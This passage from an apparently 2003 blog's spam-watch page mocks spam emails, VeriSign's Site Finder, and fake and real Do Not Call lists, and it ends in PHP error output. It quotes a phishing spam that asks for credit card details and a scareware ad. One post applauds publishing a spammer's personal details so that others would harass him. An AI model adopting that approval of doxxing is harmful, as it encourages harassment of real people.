scratch, as well as a note for Fink users. So at this point either set of instructions will get you to your end goal. When I posted this, Neil Lee's instructions were it. And to be honest I still prefer his instructions. Also posted at BlogCritics.

October 9, 2003

You credit card has been charged for $234.65

This one caught my eye today, although this time Mail did flag it as junk. I have never seen SPAM with such a subject though. At the end of the email is a form to plug in your credit card information, what morons.
Important notice We have just charged your credit card for money laundry service in amount of $234.65 (because you are either child pornography webmaster or deal with dirty money, which require us to layndry them and then send to your checking account). If you feel this transaction was made by our mistake, please press "No". If you confirm this transaction, please press "Yes" and fill in the form below.

October 7, 2003

Every Click you take..

I have not gotten any SPAM that was this paranoid before!
You're in Serious Trouble - It's a Proven Fact! Did you know... that your computer is spying on you? Did you know for example that every click you make on Windows 98 Start Menu is logged and stored permanently on a hidden encrypted database within your own computer? Deleting "internet cache and history", will not protect you... your PC is keeping frightening records of both your online and off-line activity. Any of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything Else you or anyone else have ever viewed could easily be recovered - even many years later! 73.5% of all companies admitthey record and review their employees' communications and activities on the job.How would you feel if somebody snooped this information out of your computer and made it public? Do your children or their friends use your computers? What have they downloaded and tried to delete? Act now! And stop these files coming "back from the dead" to haunt you! You deserve...a far more rewarding and safer Internet experience! Start to enjoy the benefits of a truly clean and faster "Like New" PC! Download today with no risk, guaranteed. Evidence Eliminator... can Speed-Up your PC/Internet Browser, reclaim Hard Disk space and Professionally Clean your PC in one easy mouse click! CLICK HERE FOR EVIDENCE ELIMINATOR!

September 19, 2003

VeriSign Sued; BIND Patched

An Internet search company on Thursday filed a $100 million antitrust lawsuit against VeriSign, accusing the Web address provider of hijacking misspelled and unassigned Web addresses with a service it launched this week.
Source: C|Net
he Internet Software Consortium (ISC), the nonprofit group that publishes BIND (Berkeley Internet Name Domain) software, which runs 80 percent of domain name servers, has released a patch that will block VeriSign Inc.'s new Site Finder service... "We're talking about mail servers and electronic mail and other types of protocol besides Web protocol," he said. "The lack of a reliable indication of nonexistence meant that a lot of people were carrying traffic that they shouldn't, or they were not able to detect spam based on forged sources because there's no longer any such thing as a nonexistent domain -- they all exist now. It rubbed a lot of people the wrong way."
Source: MacCentral It serves them right, the greedy bastards. The worst part of it is that with this Verisign "feature" in place there is no way to tell if email is SPAM or not. I am willing to bet that those morons never thought of that one. I have never really liked Verisign. And when they bought Network Solutions and with that the root .net and .com DNS servers, I really don't like them. This is just another good reason not to like Verisign. Luckily, I am not the only one who feels this way.

August 11, 2003

Fake 'Do Not Call' Lists crop up

I have already seen this myself. It is just another way for SPAMers to cull more email addresses and more money from stupid people. From CNN. I cannot understand how people would pay for this when the real Do Not Call list held by the FTC does not cost a penny. But then SPAM is alive because people buy it. If you pay to be on a 'Do Not Call" list you deserve to get flooded with more SPAM.
"It's probably not worth signing up. You can get plenty of spam for free," said Howard Beales, head of the Federal Trade Commission's consumer-protection division.

June 30, 2003

Telemarketing opt-out site swamped

Full Stroy from C|NET. All I gotta say is "Well duh!"
"We knew it would be popular," said David Torok, Do Not Call project manager for the FTC. "But we've had overwhelming demand on the site. We were logging in 1,000 transactions per second, and by noon 370,000 users had registered."
I hope this works. It sure would be nice to recieve no more telemarketing phone calls. Now they just need a web site like this for SPAM. It would have to be handled by the FTC as well. I would love to see the FTC lay down some fines on SPAMers. Now this is just rich:
Even those fortunate enough to get through to the site and register Friday had trouble. For some--ironically--the desire to block unwanted marketing calls was tripped up by the blocking of unwanted marketing e-mail: Internet service providers either routed the Do Not Call registration confirmation e-mails to users' junk-mail folders, or prevented the messages from reaching in-boxes, due to the way users set up their spam-blocking filters.
And Yahoo sent these confirmation emails to the bulk email folder. Nice job!

April 24, 2003

Stick it to Spammers

And they will stick it to you! he he. this article is great! Francis Uy found the name, address, and phone number (must of been some really dumb guy to give all that info) of some spammer sending him deals on anti-virus software and posted the info on a web site. people ended up sending bogus magazine subs. to this guy. what great punishment for a spammer! From MacCentral: "When the issue finally did make it to court, it was Moore who brought it there, claiming that he had received eight harassing telephone calls, more than 200 unwanted magazines and dozens of products that he never ordered. Moore sued Uy for harassment." and he lost! As he rightfully should! If I were Francis Uy I would have a smirk on my face from ear to ear. Francis Uy Web Page

April 2, 2003

Ken, are you tired of spam?

Ironic don't you think? I get two pieces of spam like this a week. The reason this one get my attention is because POPFile did not catch it. They must be changing something again to get through spam filters. Its just worth a laugh because it is spam trying to sell me software that will rid me of spam. Oh and I love the ones I get trying to sell me gas masks "at rock bottom prices!" Gotta love it, cuz there is no way to stop it. I read that they have passed or are going to pass legislation in I believe the UK that will make some forms of spam ilegal. I wish our Govn't would do something about it as well.

March 4, 2003

Making money off of another tragedy

Isn't SPAM mail great! today I got an offer to get a commemerative Shuttle Columbia Silver Dollar, the Ohio "Birthplace of Aviation" quarter, the North Caralina "First Flight" quarter and official registration foir the coins. yet another tragedy and people are making money off of it. nothing to me tops 9/11 tho, and there are still people making money off of that. just plain pathetic, thats what that is. distasteful.



Warning: include(/home/meancode/public_html/breakingwindows/footer.php): failed to open stream: Permission denied in /home/breaking/public_html/features/spam_watch/index.php on line 2558

Warning: include(): Failed opening '/home/meancode/public_html/breakingwindows/footer.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/breaking/public_html/features/spam_watch/index.php on line 2558